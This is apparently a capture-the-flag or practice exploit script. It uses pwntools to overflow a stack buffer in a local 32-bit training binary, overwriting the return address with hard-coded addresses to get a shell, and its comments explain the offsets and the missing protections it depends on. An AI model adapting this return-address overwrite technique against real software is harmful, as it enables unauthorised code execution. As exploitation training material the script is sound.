from pwn import *
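# Local proof-of-concept for a stack overflow in the 32-bit practice binary
# ./question_4_1_x86: it sends a fixed-length filler followed by two
# hard-coded 32-bit values after the program prints its "input:" prompt.
context(log_level='debug', arch='i386', os='linux')
pwnfile = './question_4_1_x86'
io = process(pwnfile)
#io = remote('', )
elf = ELF(pwnfile)  # not referenced again in this script
rop = ROP(pwnfile)  # not referenced again in this script

# Going by the name, the distance from the start of the vulnerable buffer to
# the saved EBP -- presumably measured in a debugger; confirm against the binary.
padding2ebp = 0x10
# context.word_size is 32 for i386, so this adds 4 more bytes (presumably the
# saved-EBP slot), giving 0x14 bytes of filler before the next stack word.
padding = padding2ebp + context.word_size//8

# Obtained by debugging this specific build.
# NOTE(review): both values are absolute addresses, so they only hold while the
# binary is mapped at a fixed base (i.e. presumably built without PIE), and the
# fixed-offset overwrite presumably relies on there being no stack canary.
# Building with PIE and -fstack-protector, plus a bounded read in the target,
# would invalidate these constants -- verify with checksec.
return_addr = 0x80491af
sh_addr = 0x0804c03e

# flat() packs the integers as little-endian 32-bit words per `context`.
payload = flat([cyclic(padding), return_addr, sh_addr])

# bytes rather than str: pwntools tubes work on bytes and emit a BytesWarning
# for text delimiters under Python 3.
delimiter = b'input:'
io.sendlineafter(delimiter, payload)
io.interactive()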